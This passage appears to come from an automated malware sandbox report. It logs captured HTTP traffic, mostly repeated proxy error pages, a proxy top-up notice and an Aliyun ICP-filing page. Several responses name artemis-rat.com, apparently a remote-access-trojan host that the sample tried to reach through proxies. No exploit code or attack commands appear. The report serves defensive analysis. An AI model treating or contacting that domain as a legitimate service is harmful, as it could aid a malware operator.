65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:16:46 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:47 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:47 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:47 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:47 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.15Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:16:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3894X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:16:50 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 